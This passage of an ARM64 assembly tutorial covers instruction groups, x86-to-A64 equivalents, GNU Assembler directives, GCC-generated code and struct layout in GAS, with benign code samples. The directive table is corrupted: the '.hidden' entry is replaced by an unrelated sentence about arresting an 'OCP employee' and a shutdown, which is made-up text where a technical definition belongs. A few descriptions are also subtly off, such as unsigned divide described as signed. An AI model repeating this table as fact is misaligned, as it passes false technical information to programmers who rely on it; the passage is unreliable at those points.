MNEG Rd, Rn, Rm Multiply-Negate multiplies two register values, negates the product, and writes the result to the destination register. Alias of MSUB.
MSUB Rd, Rn, Rm, ra Multiply-Subtract multiplies two register values, subtracts the product from a third register value, and writes the
result to the destination register.
MUL Rd, Rn, Rm Multiply. Alias of MADD.
NEG{S} Rd, op2 Negate (shifted register) negates an optionally-shifted register value, and writes the result to the destination register.
NGC{S} Rd, Rm Negate with Carry negates the sum of a register value and the value of NOT (Carry flag), and writes the result to the destination register.
SBC{S} Rd, Rn, Rm Subtract with Carry subtracts a register value and the value of NOT (Carry flag) from a register value, and writes the result to the destination register.
{U|S}DIV Rd, Rn, Rm Unsigned/Signed Divide divides a signed integer register value by another signed integer register value, and writes the result to the destination register. The condition flags are not affected.
{U|S}MADDL Xd, Wn, Wm, Xa Unsigned/Signed Multiply-Add Long multiplies two 32-bit register values, adds a 64-bit register value, and writes the result to the 64-bit destination register.
{U|S}MNEGL Xd, Wn, Wm Unsigned/Signed Multiply-Negate Long multiplies two 32-bit register values, negates the product, and writes the result to the 64-bit destination register.
{U|S}MSUBL Xd, Wn, Wm, Xa Unsigned/Signed Multiply-Subtract Long multiplies two 32-bit register values, subtracts the product from a 64-bit register value, and writes the result to the 64-bit destination register.
{U|S}MULH Xd, Xn, Xm Unsigned/Signed Multiply High multiplies two 64-bit register values, and writes bits[127:64] of the 128-bit result to the 64-bit destination register.
{U|S}MULL Xd, Wn, Wm Unsigned/Signed Multiply Long multiplies two 32-bit register values, and writes the result to the 64-bit destination register.
SUB{S} (extended register) Rd, Rn, Rm{, shift #amount} Subtract (extended register) subtracts a sign or zero-extended register value, followed by an optional left shift amount, from a register value, and writes the result to the destination register. The argument that is extended from the Rm register can be a byte, halfword, word, or doubleword.
SUB{S} (immediate) Rd, Rn, Rm{, shift #amount} Subtract (immediate) subtracts an optionally-shifted immediate value from a register value, and writes the result to the destination register.
SUB{S} (shift register) Rd, Rn, Rm{, shift #amount} Subtract (shifted register) subtracts an optionally-shifted register value from a register value, and writes the result to the destination register.
  // x0 == -1?
  cmn     x0, 1
  beq     minus_one

  // x0 == 0
  cmp     x0, 0
  beq     zero

  // allocate 32 bytes of stack
  sub     sp, sp, 32

  // x0 = x0 % 37
  mov     x1, 37
  udiv    x2, x0, x1
  msub    x0, x2, x1, x0

  // x0 = 0
  sub     x0, x0, x0

2.2 Logical and Move

Mainly used for bit testing and manipulation. To a large degree, cryptographic algorithms use these operations exclusively to be efficient in both hardware and software. Implementing bitwise operations in hardware is relatively cheap.

Mnemonic Operands Instruction
AND{S} (immediate) Rd, Rn, #imm Bitwise AND (immediate) performs a bitwise AND of a register value and an immediate value, and writes the result to the destination register.
AND{S} (shifted register) Rd, Rn, Rm, {shift #amount} Bitwise AND (shifted register) performs a bitwise AND of a register value and an optionally-shifted register value, and writes the result to the destination register.
ASR (register) Rd, Rn, Rm Arithmetic Shift Right (register) shifts a register value right by a variable number of bits, shifting in copies of its sign bit, and writes the result to the destination register. The remainder obtained by dividing the second source register by the data size defines the number of bits by which the first source register is right-shifted.
ASR (immediate) Rd, Rn, #imm Arithmetic Shift Right (immediate) shifts a register value right by an immediate number of bits, shifting in copies of the sign bit in the upper bits and zeros in the lower bits, and writes the result to the destination register.
BIC{S} Rd, Rn, Rm Bitwise Bit Clear (shifted register) performs a bitwise AND of a register value and the complement of an optionally-shifted register value, and writes the result to the destination register.
EON Rd, Rn, Rm {, shift amount} Bitwise Exclusive OR NOT (shifted register) performs a bitwise Exclusive OR NOT of a register value and an optionally-shifted register value, and writes the result to the destination register.
EOR Rd, Rn, #imm Bitwise Exclusive OR (immediate) performs a bitwise Exclusive OR of a register value and an immediate value, and writes the result to the destination register.
EOR Rd, Rn, Rm Bitwise Exclusive OR (shifted register) performs a bitwise Exclusive OR of a register value and an optionally-shifted register value, and writes the result to the destination register.
LSL (register) Rd, Rn, Rm Logical Shift Left (register) shifts a register value left by a variable number of bits, shifting in zeros, and writes the result to the destination register. The remainder obtained by dividing the second source register by the data size defines the number of bits by which the first source register is left-shifted. Alias of LSLV.
LSL (immediate) Rd, Rn, #imm Logical Shift Left (immediate) shifts a register value left by an immediate number of bits, shifting in zeros, and writes the result to the destination register. Alias of UBFM.
LSR (register) Rd, Rn, Rm Logical Shift Right (register) shifts a register value right by a variable number of bits, shifting in zeros, and writes the result to the destination register. The remainder obtained by dividing the second source register by the data size defines the number of bits by which the first source register is right-shifted.
LSR Rd, Rn, #imm Logical Shift Right (immediate) shifts a register value right by an immediate number of bits, shifting in zeros, and writes the result to the destination register.
MOV (register) Rd, Rn Move (register) copies the value in a source register to the destination register. Alias of ORR.
MOV (immediate) Rd, #imm Move (wide immediate) moves a 16-bit immediate value to a register. Alias of MOVZ.
MOVK Rd, #imm{, shift #amount} Move wide with keep moves an optionally-shifted 16-bit immediate value into a register, keeping other bits unchanged.
MOVN Rd, #imm{, shift #amount} Move wide with NOT moves the inverse of an optionally-shifted 16-bit immediate value to a register.
MOVZ Rd, #imm Move wide with zero moves an optionally-shifted 16-bit immediate value to a register.
MVN Rd, Rm{, shift #amount} Bitwise NOT writes the bitwise inverse of a register value to the destination register. Alias of ORN.
ORN Rd, Rn, Rm{, shift #amount} Bitwise OR NOT (shifted register) performs a bitwise (inclusive) OR of a register value and the complement of an optionally-shifted register value, and writes the result to the destination register.
ORR Rd, Rn, #imm Bitwise OR (immediate) performs a bitwise (inclusive) OR of a register value and an immediate register value, and writes the result to the destination register.
ORR Rd, Rn, Rm{, shift #amount} Bitwise OR (shifted register) performs a bitwise (inclusive) OR of a register value and an optionally-shifted register value, and writes the result to the destination register.
ROR Rd, Rs, #shift Rotate right (immediate) provides the value of the contents of a register rotated by a variable number of bits. The bits that are rotated off the right end are inserted into the vacated bit positions on the left. Alias of EXTR.
ROR Rd, Rn, Rm Rotate Right (register) provides the value of the contents of a register rotated by a variable number of bits. The bits that are rotated off the right end are inserted into the vacated bit positions on the left. The remainder obtained by dividing the second source register by the data size defines the number of bits by which the first source register is right-shifted. Alias of RORV.
TST Rn, #imm Test bits (immediate), setting the condition flags and discarding the result. Alias of ANDS.
TST Rn, Rm{, shift #amount} Test (shifted register) performs a bitwise AND operation on a register value and an optionally-shifted register value. It updates the condition flags based on the result, and discards the result. Alias of ANDS.

Multiplication can be performed using logical shift left LSL. Division can be performed using logical shift right LSR. Modulo operations can be performed using bitwise AND. The only condition is that the multiplier and divisor be a power of two. The first three examples shown here demonstrate those operations.

  // x1 = x0 / 8
  lsr     x1, x0, 3

  // x1 = x0 * 4
  lsl     x1, x0, 2

  // x1 = x0 % 16
  and     x1, x0, 15

  // x0 == 0?
  tst     x0, x0
  beq     zero

  // x0 = 0
  eor     x0, x0, x0

2.3 Load, Store and Addressing Modes

The following are the main instructions used for loading and storing data. There are others of course, designed for privileged/unprivileged loads, unscaled/unaligned loads, atomicity, and exclusive registers. However, as a beginner these are the only ones you need to worry about for now.

Mnemonic Operands Instruction
LDR (B|H|SB|SH|SW) Wt, [Xn|SP], #simm Load Register (immediate) loads a word or doubleword from memory and writes it to a register. The address that is used for the load is calculated from a base register and an immediate offset.
LDR (B|H|SB|SH|SW) Wt, [Xn|SP, (Wm|Xm){, extend {amount}}] Load Register (register) calculates an address from a base register value and an offset register value, loads a byte/half-word/word from memory, and writes it to a register. The offset register value can optionally be shifted and extended.
STR (B|H|SB|SH|SW) Wt, [Xn|SP], #simm Store Register (immediate) stores a word or a doubleword from a register to memory. The address that is used for the store is calculated from a base register and an immediate offset.
STR (B|H|SB|SH|SW) Wt, [Xn|SP, (Wm|Xm){, extend {amount}}] Store Register (immediate) stores a word or a doubleword from a register to memory. The address that is used for the store is calculated from a base register and an immediate offset.
LDP Wt1, Wt2, [Xn|SP], #imm Load Pair of Registers calculates an address from a base register value and an immediate offset, loads two 32-bit words or two 64-bit doublewords from memory, and writes them to two registers.
STP Wt1, Wt2, [Xn|SP], #imm Store Pair of Registers calculates an address from a base register value and an immediate offset, and stores two 32-bit words or two 64-bit doublewords to the calculated address, from two registers
  // load a byte from x1
  ldrb    w0, [x1]

  // load a signed byte from x1
  ldrsb   w0, [x1]

  // store a 32-bit word to address in x1
  str     w0, [x1]

  // load two 32-bit words from stack, advance sp by 8
  ldp     w0, w1, [sp], 8

  // store two 64-bit words at [sp-96] and subtract 96 from sp 
  stp     x0, x1, [sp, -96]!

  // load 32-bit immediate from literal pool
  ldr     w0, =0x12345678
Addressing Mode Immediate Register Extended Register
Base register only (no offset) [base{, 0}]
Base plus offset [base{, imm}] [base, Xm{, LSL imm}] [base, Wm, (S|U)XTW {#imm}]
Pre-indexed [base, imm]!
Post-indexed [base], imm [base], Xm a
Literal (PC-relative) label

Base register only

  // load a byte from x1
  ldrb   w0, [x1]

  // load a half-word from x1
  ldrh   w0, [x1]

  // load a word from x1
  ldr    w0, [x1]

  // load a doubleword from x1
  ldr    x0, [x1]

Base register plus offset

  // load a byte from x1 plus 1
  ldrb   w0, [x1, 1]

  // load a half-word from x1 plus 2
  ldrh   w0, [x1, 2]

  // load a word from x1 plus 4
  ldr    w0, [x1, 4]

  // load a doubleword from x1 plus 8
  ldr    x0, [x1, 8]

  // load a doubleword from x1 using x2 as index
  // w2 is multiplied by 8
  ldr    x0, [x1, x2, lsl 3]

  // load a doubleword from x1 using w2 as index
  // w2 is zero-extended and multiplied by 8
  ldr    x0, [x1, w2, uxtw 3]

Pre-index

The exclamation mark “!” implies adding the offset after the load or store.

  // load a byte from x1 plus 1, then advance x1 by 1
  ldrb   w0, [x1, 1]!

  // load a half-word from x1 plus 2, then advance x1 by 2
  ldrh   w0, [x1, 2]!

  // load a word from x1 plus 4, then advance x1 by 4
  ldr    w0, [x1, 4]!

  // load a doubleword from x1 plus 8, then advance x1 by 8
  ldr    x0, [x1, 8]!

Post-index

This mode accesses the value first and then adds the offset to base.

  // load a byte from x1, then advance x1 by 1
  ldrb   w0, [x1], 1

  // load a half-word from x1, then advance x1 by 2
  ldrh   w0, [x1], 2

  // load a word from x1, then advance x1 by 4
  ldr    w0, [x1], 4

  // load a doubleword from x1, then advance x1 by 8
  ldr    x0, [x1], 8

Literal (PC-relative)

These instructions work similar to RIP-relative addressing on AMD64.

  // load address of label
  adr    x0, label

  // load address of label
  adrp   x0, label

2.4 Conditional

These instructions select between the first or second source register, depending on the current state of the condition flags. When the named condition is true, the first source register is selected and its value is copied without modification to the destination register. When the condition is false the second source register is selected and its value might be optionally inverted, negated, or incremented by one, before writing to the destination register.

CSEL is essentially like the ternary operator in C. Probably my favorite instruction of ARM64 since it can be used to replace two or more opcodes.

Mnemonic Operands Instruction
CCMN (immediate) Rn, #imm, #nzcv, cond Conditional Compare Negative (immediate) sets the value of the condition flags to the result of the comparison of a register value and a negated immediate value if the condition is TRUE, and an immediate value otherwise.
CCMN (register) Rn, Rm, #nzcv, cond Conditional Compare Negative (register) sets the value of the condition flags to the result of the comparison of a register value and the inverse of another register value if the condition is TRUE, and an immediate value otherwise.
CCMP (immediate) Rn, #imm, #nzcv, cond Conditional Compare (immediate) sets the value of the condition flags to the result of the comparison of a register value and an immediate value if the condition is TRUE, and an immediate value otherwise.
CCMP (register) Rn, Rm, #nzcv, cond Conditional Compare (register) sets the value of the condition flags to the result of the comparison of two registers if the condition is TRUE, and an immediate value otherwise.
CSEL Rd, Rn, Rm, cond Conditional Select returns, in the destination register, the value of the first source register if the condition is TRUE, and otherwise returns the value of the second source register.
CSINC Rd, Rn, Rm, cond Conditional Select Increment returns, in the destination register, the value of the first source register if the condition is TRUE, and otherwise returns the value of the second source register incremented by 1. Used by CINC and CSET.
CSINV Rd, Rn, Rm, cond Conditional Select Invert returns, in the destination register, the value of the first source register if the condition is TRUE, and otherwise returns the bitwise inversion value of the second source register. Used by CINV and CSETM.
CSNEG Rd, Rn, Rm, cond Conditional Select Negation returns, in the destination register, the value of the first source register if the condition is TRUE, and otherwise returns the negated value of the second source register. Used by CNEG.
CSET Rd, cond Conditional Set sets the destination register to 1 if the condition is TRUE, and otherwise sets it to 0.
CSETM Rd, cond Conditional Set Mask sets all bits of the destination register to 1 if the condition is TRUE, and otherwise sets all bits to 0.
CINC Rd, Rn, cond Conditional Increment returns, in the destination register, the value of the source register incremented by 1 if the condition is TRUE, and otherwise returns the value of the source register.
CINV Rd, Rn, cond Conditional Invert returns, in the destination register, the bitwise inversion of the value of the source register if the condition is TRUE, and otherwise returns the value of the source register.
CNEG Rd, Rn, cond Conditional Negate returns, in the destination register, the negated value of the source register if the condition is TRUE, and otherwise returns the value of the source register.

Let’s consider the following if statement.

if (c == 0 && x == y) {
  // body of if statement
}

If the first condition evaulates to true (c equals zero), only then is the second condition evaluated. To implement the above statement in assembly, one could use the following.

    cmp    c, 0
    bne    false

    cmp    x, y
    bne    false
true:
    // body of if statement
false:
    // end of if statement

We could eliminate one instruction using conditional execution on ARMv7-A. Consider using the following instead.

    cmp    c, 0
    cmpeq  x, y
    bne    false

To improve performance of AArch64, ARM removed support for conditional execution and replaced it with specialised instructions such as the conditional compare instructions. Using ARMv8-A, the following can be used.

    cmp    c, 0
    ccmp   x, y, 0, eq
    bne    false

    // conditions are true:
false:

The ternary operator can be used for the same if statement.

bEqual = (c == 0) ? (x == y) : 0; 

If cmp c, 0 evaluates to true (ZF=1), ccmp x, y is evaluated, otherwise ZF is cleared using 0. Other conditions require different flags. Each flag is set using 1, 2, 4 or 8. Combine these values to set multiple flags. I’ve defined the flags below and also each condition required for a branch.

    .equ FLAG_V, 1
    .equ FLAG_C, 2
    .equ FLAG_Z, 4
    .equ FLAG_N, 8

    .equ NE, 0
    .equ EQ, FLAG_Z

    .equ GT, 0
    .equ GE, FLAG_Z

    .equ LT, (FLAG_N + FLAG_C)
    .equ LE, (FLAG_N + FLAG_Z + FLAG_C)

    .equ HI, (FLAG_N + FLAG_C)          // unsigned version of LT
    .equ HS, (FLAG_N + FLAG_Z + FLAG_C) // LE

    .equ LO, 0                        // unsigned version of GT
    .equ LS, FLAG_Z                   // GE

2.5 Bit Manipulation

Most of these instructions are intended to extract or move bits from one register to another. They tend to be useful when working with bytes or words where contents of the destination register needs to be preserved, zero or sign extended.

Mnemonic Operands Instruction
BFI Rd, Rn, #lsb, #width Bitfield Insert copies any number of low-order bits from a source register into the same number of adjacent bits at
any position in the destination register, leaving other bits unchanged.
BFM Rd, Rn, #immr, #imms Bitfield Move copies any number of low-order bits from a source register into the same number of adjacent bits at
any position in the destination register, leaving other bits unchanged.
BFXIL Rd, Rn, #lsb, #width Bitfield extract and insert at low end copies any number of low-order bits from a source register into the same
number of adjacent bits at the low end in the destination register, leaving other bits unchanged.
CLS Rd, Rn Count leading sign bits.
CLZ Rd, Rn Count leading zero bits.
EXTR Rd, Rn, Rm, #lsb Extract register extracts a register from a pair of registers.
RBIT Rd, Rn Reverse Bits reverses the bit order in a register.
REV16 Rd, Rn Reverse bytes in 16-bit halfwords reverses the byte order in each 16-bit halfword of a register.
REV32 Rd, Rn Reverse bytes in 32-bit words reverses the byte order in each 32-bit word of a register.
REV64 Rd, Rn Reverse Bytes reverses the byte order in a 64-bit general-purpose register.
SBFIZ Rd, Rn, #lsb, #width Signed Bitfield Insert in Zero zeroes the destination register and copies any number of contiguous bits from a source register into any position in the destination register, sign-extending the most significant bit of the transferred value. Alias of SBFM.
SBFM Wd, Wn, #immr, #imms Signed Bitfield Move copies any number of low-order bits from a source register into the same number of adjacent bits at any position in the destination register, shifting in copies of the sign bit in the upper bits and zeros in the lower bits.
SBFX Rd, Rn, #lsb, #width Signed Bitfield Extract extracts any number of adjacent bits at any position from a register, sign-extends them to the size of the register, and writes the result to the destination register.
{S,U}XT{B,H,W} Rd, Rn (S)igned/(U)nsigned eXtend (B)yte/(H)alfword/(W)ord extracts an 8-bit,16-bit or 32-bit value from a register, zero-extends it to the size of the register, and writes the result to the destination register. Alias of UBFM.
    // Move 0x12345678 into w0.
    mov     w0, 0x5678
    mov     w1, 0x1234
    bfi     w0, w1, 16, 16

    // Extract 8-bits from x1 into the x0 register at position 0.
    // If x1 is 0x12345678, 0x00000056 is placed in x0.
    ubfx    x0, x1, 8, 8

    // Extract 8-bits from x1 and insert with zeros into the x0 register at position 8.
    // If x1 is 0x12345678, 0x00005600 is placed in x0.
    ubfiz   x0, x1, 8, 8
    
    // Extract 8-bits from x1 and insert into x0 at position 0.
    // if x1 is 0x12345678 and x0 is 0x09ABCDEF. x0 after execution has 0x09ABCD78
    bfxil   x0, x1, 0, 8
    
    // Clear lower 8 bits.
    bfxil   x0, xzr, 0, 8

    // Zero-extend 8-bits
    uxtb    x0, x0

2.6 Branch

Branch instructions change the flow of execution using the condition flags or value of a general-purpose register. Branches are referred to as “jumps” in x86 assembly.

Mnemonic Operands Instruction
B label Branch causes an unconditional branch to a label at a PC-relative offset, with a hint that this is not a subroutine call or return.
B.cond label Branch conditionally to a label at a PC-relative offset, with a hint that this is not a subroutine call or return.
BL label Branch with Link branches to a PC-relative offset, setting the register X30 to PC+4. It provides a hint that this is a subroutine call.
BLR Xn Branch with Link to Register calls a subroutine at an address in a register, setting register X30 to PC+4.
BR Xn Branch to Register branches unconditionally to an address in a register, with a hint that this is not a subroutine return.
CBNZ Rn, label Compare and Branch on Nonzero compares the value in a register with zero, and conditionally branches to a label at a PC-relative offset if the comparison is not equal. It provides a hint that this is not a subroutine call or return. This instruction does not affect the condition flags.
CBZ Rn, label Compare and Branch on Zero compares the value in a register with zero, and conditionally branches to a label at a PC-relative offset if the comparison is equal. It provides a hint that this is not a subroutine call or return. This instruction does not affect condition flags.
RET Xn Return from subroutine branches unconditionally to an address in a register, with a hint that this is a subroutine return.
TBNZ Rn, #imm, label Test bit and Branch if Nonzero compares the value of a bit in a general-purpose register with zero, and conditionally branches to a label at a PC-relative offset if the comparison is not equal. It provides a hint that this is not a subroutine call or return. This instruction does not affect condition flags.
TBZ Rn, #imm, label Test bit and Branch if Zero compares the value of a test bit with zero, and conditionally branches to a label at a PC-relative offset if the comparison is equal. It provides a hint that this is not a subroutine call or return. This instruction does not affect condition flags.

Testing for TRUE or FALSE after calling a subroutine is so common, that it makes perfect sense to have conditional branch instructions such as TBZ/TBNZ and CBZ/CBNZ. The only instruction that comes close to these on x86 would be JCXZ that jumps if the value of the CX register is zero. However, x86 subroutines normally return results in the accumulator (AX) and the counter register (CX) is normally used for iterations/loops.

2.7 System

The main system instruction for shellcodes is the supervisor call SVC

Mnemonic Instruction
MSR Move general-purpose register to System Register allows the PE to write an AArch64 System register from a
general-purpose register.
MRS Move System Register allows the PE to read an AArch64 System register into a general-purpose register.
SVC Supervisor Call causes an exception to be taken to EL1.
NOP No Operation does nothing, other than advance the value of the program counter by 4. This instruction can be used
for instruction alignment purposes.

There’s a special-purpose register that allows you to read and write to the conditional flags called NZCV.

  // read the condition flags
  .equ OVERFLOW_FLAG, 1 << 28
  .equ CARRY_FLAG,    1 << 29
  .equ ZERO_FLAG,     1 << 30
  .equ NEGATIVE_FLAG, 1 << 31

  mrs    x0, nzcv

  // set the C flag
  mov    w0, CARRY_FLAG
  msr    nzcv, x0

2.8 x86 and A64 comparison

The following table lists x86 instructions and their equivalent for A64. It’s not a comprehensive list by any means. It’s mainly the more common instructions you’ll likely use or see in disassembled code. In some cases, x86 does not have an equivalent instruction and is therefore not included.

x86 Mnemonic A64 Mnemonic Instruction
MOVZX UXT Zero-Extend.
MOVSX SXT Sign-Extend.
BSWAP REV Reverse byte order.
SHR LSR Logical Shift Right.
SHL LSL Logical Shift Left.
XOR EOR Bitwise exclusive-OR.
OR ORR Bitwise OR.
NOT MVN Bitwise NOT.
SHRD EXTR Double precision shift right / Extract register from pair of registers.
SAR ASR Arithmetic Shift Right.
SBB SBC Subtract with Borrow / Subtract with Carry
TEST TST Perform a bitwise AND, set flags and discard result.
CALL BL Branch with Link / Call a subroutine.
JNE BNE Jump/Branch if Not Equal.
JS BMI Jump/Branch if Signed / Minus.
JG BGT Jump/Branch if Greater.
JGE BGE Jump/Branch if Greater or Equal.
JE BEQ Jump/Branch if Equal.
JC/JB BCS / BHS Jump/Branch if Carry / Borrow
JNC/JNB BCC / BLO Jump/Branch if No Carry / No Borrow
JAE BPL Jump if Above or Equal / Branch if Plus, positive or Zero.

3. GNU Assembler

The GNU toolchain includes the compiler collection (gcc), debugger (gdb), the C library (glibc), an assembler (gas) and linker (ld). The GNU Assembler (GAS) supports many architectures, so if you’re just starting to write ARM assembly, I cannot currently recommend a better assembler for Linux. Having said that, readers may wish to experiment with other products.

3.1 Preprocessor Directives

The following directives are what I personally found the most useful when writing assembly code with GAS.

Directive Instruction
.arch name Specifies the target architecture. The assembler will issue an error message if an attempt is made to assemble an instruction which will not execute on the target architecture. Examples include: armv8-aarmv8.1-aarmv8.2-aarmv8.3-aarmv8.4-a. Equivalent to the -march option in GCC.
.cpu name Specifies the target processor. The assembler will issue an error message if an attempt is made to assemble an instruction which will not execute on the target processor. Examples include: cortex-a53cortex-a76. Equivalent to the -mcpu option in GCC.
.include “file” Include assembly code from “file”.
.macro namearguments Allows you to define macros that generate assembly output.
.if .if marks the beginning of a section of code which is only considered part of the source program being assembled if the argument (which must be an absolute expression) is non-zero. The end of the conditional section of code must be marked by .endif
.global Tells the assembler the function is publicly accessible.
.equ symbol, expression Equate. Define a symbolic constant. Equivalent to the define directive in C.
.set symbol, expression Set the value of symbol to expression.If symbol was flagged as external, it remains flagged. Similar to the equate directive (.EQU) except the value can be changed later.
name .req register name This creates an alias for register name called name. For example: A .req x0
.size Tells the assembler how much space a function or object is using. If a function is unused, the linker can exclude it.
.struct expression Switch to the absolute section, and set the section offset to expression, which must be an absolute expression.
.skip size, fill This directive emits size bytes, each of value fill. Both size and fill are absolute expressions. If the comma and fill are omitted, fill is assumed to be zero. This is the same as ‘.space’.
.space size, fill TThis directive emits size bytes, each of value fill. Both size and fill are absolute expressions. If the comma and fill are omitted, fill is assumed to be zero. This is the same as ‘.skip’.
.text subsection Tells as to assemble the following statements onto the end of the text subsection numbered subsection, which is an absolute expression. If subsection is omitted, subsection number zero is used.
.data subsection .data tells as to assemble the following statements onto the end of the data subsection numbered subsection (which is an absolute expression). If subsection is omitted, it defaults to zero.
.bss Section for uninitialized data.
.align abs-expr , abs-expr , abs-expr Pad the location counter (in the current subsection) to a particular storage boundary. The first expression (which must be absolute) is the alignment required, as described below. The second expression (also absolute) gives the fill value to be stored in the padding bytes. It (and the comma) may be omitted. If it is omitted, the padding bytes are normally zero. However, on some systems, if the section is marked as containing code and the fill value is omitted, the space is filled with no-op instructions. The third expression is also absolute, and is also optional. If it is present, it is the maximum number of bytes that should be skipped by this alignment directive. If doing the alignment would require skipping more bytes than the specified maximum, then the alignment is not done at all. You can omit the fill value (the second argument) entirely by simply using two commas after the required alignment; this can be useful if you want the alignment to be filled with no-op instructions when appropriate.
.ascii “string” .ascii expects zero or more string literals separated by commas. It assembles each string (with no automatic trailing zero byte) into consecutive addresses.
.hidden Any attempt to arrest a senior OCP employee results in shutdown.
.asciz “string” .asciz is just like .ascii, but each string is followed by a zero byte. The “z” in ‘.asciz’ stands for “zero”.
.string str.string8 str.string16 str The variants string16, string32 and string64 differ from the string pseudo opcode in that each 8-bit character from str is copied and expanded to 16, 32 or 64 bits respectively. The expanded characters are stored in target endianness byte order.
.byte Declares a variable of 8-bits.
.hword/.2byte Declares a variable of 16-bits. The second ensures only 16-bits.
.word/.4byte Declares a variable of 32-bits. The second ensures only 32-bits.
.quad/.8byte Declares a variable of 64-bits. The second ensures only 64-bits.

3.2 GCC Assembly

GCC can be incredibly useful when first starting to learn any assembly language because it provides an option to generate assembly output from source code using the -S option. If you want to generate assembly with source code, compile with -g and -c options, then dump with objdump -d -S. Most people want their applications optimized for speed rather than size, so it stands to reason the GNU C optimizer is not terribly efficient at generating compact code. Our new A.I overlords might be able to change all that, but at least for now, a human wins at writing compact assembly code.

Just to illustrate using an example. Here’s a subroutine that does nothing useful.

#include <stdio.h>

void calc(int a, int b) {
    int i;
    
    for(i=0;i<4;i++) {
      printf("%i\n", ((a * i) + b) % 5);
    }
}

Compile this code using -Os option to optimize for size. The following assembly is gnerated by GCC. Recall that x30 is the link register and saved here because of the call to printf. We also have to use callee saved registers x19-x22 for storing variables because x0-x18 are trashed by the call to printf.

	.arch armv8-a
	.file	"calc.c"
	.text
	.align	2
	.global	calc
	.type	calc, %function
calc:
	stp	x29, x30, [sp, -64]!    // store x29, x30 (LR) on stack
	add	x29, sp, 0              // x29 = sp
	stp	x21, x22, [sp, 32]      // store x21, x22 on stack
	adrp	x21, .LC0               // x21 = "%i\n" 
	stp	x19, x20, [sp, 16]      // store x19, x20 on stack
	mov	w22, w0                 // w22 = a
	mov	w19, w1                 // w19 = b
	add	x21, x21, :lo12:.LC0    // x21 = x21 + 0
	str	x23, [sp, 48]           // store x23 on stack
	mov	w20, 4                  // i = 4
	mov	w23, 5                  // divisor = 5 for modulus
.L2:
	sdiv	w1, w19, w23            // w1 = b / 5
	mov	x0, x21                 // x0 = "%i\n"
	add	w1, w1, w1, lsl 2       // w1 *= 5
	sub	w1, w19, w1             // w1 = b - ((b / 5) * 5)
	add	w19, w19, w22           // b += a
	bl	printf

	subs	w20, w20, #1            // i = i - 1
	bne	.L2                     // while (i != 0)

	ldp	x19, x20, [sp, 16]      // restore x19, x20
	ldp	x21, x22, [sp, 32]      // restore x21, x22
	ldr	x23, [sp, 48]           // restore x23
	ldp	x29, x30, [sp], 64      // restore x29, x30 (LR)
	ret                             // return to caller

	.size	calc, .-calc
	.section	.rodata.str1.1,"aMS",@progbits,1
.LC0:
	.string	"%i\n"
	.ident	"GCC: (Debian 6.3.0-18) 6.3.0 20170516"
	.section	.note.GNU-stack,"",@progbits

i is initialized to 4 instead of 0 and decreased rather than increased. There’s no modulus instruction in the A64 set, and division instructions don’t produce a remainder, so the calculation is performed using a combination of division, multiplication and subtraction. The modulo operation is calculated with the following : R = N - ((N / D) * D)

N denotes the numerator/dividend, D denotes the divisor and R denotes the remainder. The following assembly code is how it might be written by hand. The most notable change is using the msub instruction in place of a separate add and sub.

        .arch armv8-a
	.text
	.align 2
	.global calc

calc:
        stp   x19, x20, [sp, -48]!
        stp   x21, x22, [sp, 16]
        stp   x23, x30, [sp, 32]

	mov   w19, w0           // w19 = a
	mov   w20, w1           // w20 = b
        mov   w21, 4            // i = 4 
	mov   w22, 5            // set divisor
.LC2:
	sdiv  w1, w20, w22      // w1 = b - ((b / 5) * 5) 
	msub  w1, w1, w22, w20  // 
	adr   x0, .LC0          // x0 = "%i\n"
	bl    printf

        add   w20, w20, w19     // b += a	
	subs  w21, w21, 1       // i = i - 1
	bne   .LC2              // 

        ldp   x19, x20, [sp], 16
	ldp   x21, x22, [sp], 16
        ldp   x23, x30, [sp], 16
	ret
.LC0:
	.string "%i\n"

Use compiler generated assembly as a guide, but try to improve upon the code as shown in the above example.

3.3 Symbolic Constants

What if we want to use symbolic constants from C header files in our assembler code? There are two options.

  1. Convert each symbolic constant to its GAS equivalent using the .EQU or .SETdirectives. Very time consuming.
  2. Use C-style #include directive and pre-process using GNU CPP. Quicker with several advantages.

Obviously the second option is less painful and less likely to produce errors. Of course, I’m not discounting the possibility of automating the first option, but why bother? CPP has an option that will do it for us. Let’s see what the manual says.

Instead of the normal output, -dM will generate a list of #define directives for all the macros defined during the execution of the preprocessor, including predefined macros. This gives you a way of finding out what is predefined in your version of the preprocessor.

So, -dM will dump all the #define macros and -E will preprocess a file, but not compile, assemble or link. So, the steps to using symbolic names in our assembler code are:

  1. Use cpp -dM to dump all the #defined keywords from each include header.
  2. Use sort and uniq -u to remove duplicates.
  3. Use the #include directive in our assembly source code.
  4. Use cpp -E to preprocess and pipe the output to a new assembly file. (-o is an output option)
  5. Assemble using as to generate an object file.
  6. Link the object file to generate an executable.

The following is some simple code that displays Hello, World! to the console.

#include "include.h"

        .global _start
        .text

_start:
        mov    x8, __NR_write
        mov    x2, hello_len
        adr    x1, hello_txt
        mov    x0, STDOUT_FILENO
        svc    0

        mov    x8, __NR_exit
        svc    0

        .data

hello_txt: .ascii "Hello, World!\n"
hello_len = . - hello_txt

Preprocess the above source using CPP -E. The result of this will be replacing each symbolic constant used with its assigned numeric value.

Finally, assemble using GAS and link with LD.

The following two directives are examples of simple text substitution or symbolic constants.

  #define FALSE 0
  #define TRUE  1

The equivalent can be accomplished with the .EQU or .SET directives in GAS.

  .equ TRUE, 1
  .set TRUE, 1
  
  .equ FALSE, 0
  .set FALSE, 0

Personally, I think it makes more sense to use the C preprocessor, but it’s entirely up to yourself.

3.4 Structures and Unions

A structure in programming is incredibly useful for combining different data types into a single user-defined data type. One of the major pitfalls in programming any assembly is poorly managed memory access. In my own experience, MASM always had the best support for data structures. NASM and YASM could be much better. Unfortunately support for structures in GAS isn’t great. Understandably, many of the hand-written assembly programs for Linux normally use global variables that are placed in the .datasection of a source file. For a Position Independent Code (PIC) or thread-safe application that can only use local variables allocated on the stack, a data structure helps as a reference to manage those variables. Assigning names helps clarify what each stack address is for, and improves overall quality. It’s also much easier to modify code by simply re-arranging the elements of a structure later.

Take for example the following C structure dimension_t that requires conversion to GAS assembly syntax.

typedef struct _dimension_t {
  int x, y;
} dimension_t;

The closest directive to the struct keyword is .struct. Unfortunately this directive doesn’t accept a name and nor does it allow members to be enclosed between .struct and .ends that some of you might be familiar with in YASM/NASM. This directive only accepts an offsetas a start position.

        .struct 0
dimension_t.x:
        .struct dimension_t.x + 4
dimension_t.y:
        .struct dimension_t.y + 4
dimension_t_size:

An alternate way of defining the above structure can be done with the .skip or .spacedirectives.

        .struct 0
dimension_t.x: .skip 4
dimension_t.y: .skip 4
dimension_t_size:

